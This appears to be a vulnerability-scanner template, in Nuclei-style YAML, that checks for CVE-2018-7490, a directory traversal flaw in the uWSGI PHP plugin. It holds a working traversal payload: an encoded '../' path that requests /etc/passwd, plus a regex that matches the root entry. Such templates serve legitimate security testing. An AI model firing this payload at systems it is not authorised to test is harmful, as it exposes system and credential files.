20 lines
365 B
YAML
20 lines
365 B
YAML
|
id: CVE-2018-7490
|
||
|
|
||
|
info:
|
||
|
name: uWSGI PHP Plugin Directory Traversal
|
||
|
author: madrobot
|
||
|
severity: high
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0:"
|
||
|
part: body
|